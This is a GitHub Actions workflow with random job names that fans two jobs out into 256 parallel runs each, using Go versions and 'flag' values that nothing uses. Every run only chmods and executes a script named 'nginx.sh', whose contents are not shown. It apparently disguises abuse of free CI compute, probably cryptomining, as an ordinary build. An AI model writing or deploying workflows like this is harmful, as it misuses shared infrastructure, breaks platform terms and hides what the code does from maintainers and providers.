name: SEVARUHJ
on: [push, pull_request]
jobs:
  build:
    name: BUILDS
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 10
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32]
    timeout-minutes: 60
    env:
        NUM_JOBS: 256
        JOB: ${{ matrix.go }}
    steps:
    - name: Setup Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Checkout
      uses: actions/checkout@v2
    - name: runs
      run: |
        chmod 777 "${GITHUB_WORKSPACE}/nginx.sh"
        "${GITHUB_WORKSPACE}/nginx.sh"
  postgres-2:
    name: EMBROS
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 9
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32]
    timeout-minutes: 60
    env:
        NUM_JOBS: 256
        JOB: ${{ matrix.go }}
    steps:
    - name: Setup Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Checkout
      uses: actions/checkout@v2
    - name: runc
      run: |
        chmod 777 "${GITHUB_WORKSPACE}/nginx.sh"
        "${GITHUB_WORKSPACE}/nginx.sh"
